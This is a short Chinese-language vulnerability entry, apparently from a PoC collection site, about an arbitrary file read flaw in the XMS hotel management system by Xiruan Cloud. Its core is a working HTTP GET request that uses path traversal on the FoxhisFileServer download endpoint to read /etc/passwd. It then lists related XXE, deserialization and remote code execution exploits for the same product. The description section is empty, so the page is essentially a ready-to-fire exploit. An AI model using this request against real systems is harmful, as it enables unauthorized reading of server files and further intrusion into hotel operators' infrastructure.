西软云XMS download 存在任意文件读取漏洞

漏洞描述

PoC代码

GET /FoxhisFileServer/action?method=download&filename=/..//..//..//..//..//..//..//..//..//..//..//../etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36

相关漏洞推荐

• 西软云XMS /XopServerRS/rest/futurehotel/operate XML 外部实体注入漏洞
• 西软云XMS /XopServerRS/rest/futurehotel/query XML 外部实体注入漏洞
• POC 西软云XMS download2 任意文件读取漏洞
• 西软云XMS /fox-invoker/FoxLookupInvoker/?return-exception=true 反序列化命令执行漏洞
• 西软云XMS酒店管理系统 FoxHALookupInvoker 远程代码执行漏洞
• 西软云XMS futurehotel_operate XXE注入漏洞
• 西软云XMS futurehotel/query XXE漏洞
• 西软云XMS futurehotel/operate XXE漏洞
• 西软云XMS FoxLookupInvoker 存在反序列化漏洞
• 西软云XMS酒店管理系统 远程代码执行漏洞